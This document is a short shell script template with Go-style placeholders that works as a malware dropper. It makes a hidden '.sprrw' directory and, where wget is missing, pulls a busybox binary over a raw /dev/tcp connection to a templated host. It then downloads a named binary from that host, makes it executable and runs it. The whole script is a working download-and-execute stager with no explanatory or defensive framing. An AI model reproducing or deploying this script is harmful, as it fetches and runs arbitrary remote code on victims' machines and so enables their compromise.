#!/bin/sh
export PATH="$PATH:/usr/local/sbin:/usr/local/bin:/usr/bin:/bin:/sbin"

workdir="{{.WP}}/.sprrw"

mkdir -p "$workdir"/bin

if ! [ $(command -v wget) ]; then
  bash -c "exec 3<>/dev/tcp/{{.Host}}/{{.Port}}; echo BSH bb>&3; cat <&3" > "$workdir"/bin/busybox
  chmod +x "$workdir"/bin/busybox
  ln -s "$workdir"/bin/busybox "$workdir"/bin/wget
  export PATH="$PATH:{{.WP}}dev/.sprrw/bin"
fi

wget -O "$workdir"/{{.Name}} {{.Protocol}}://{{.Host}}:{{.Port}}/{{.Name}}

chmod +x "$workdir"/{{.Name}}

"$workdir"/{{.Name}}
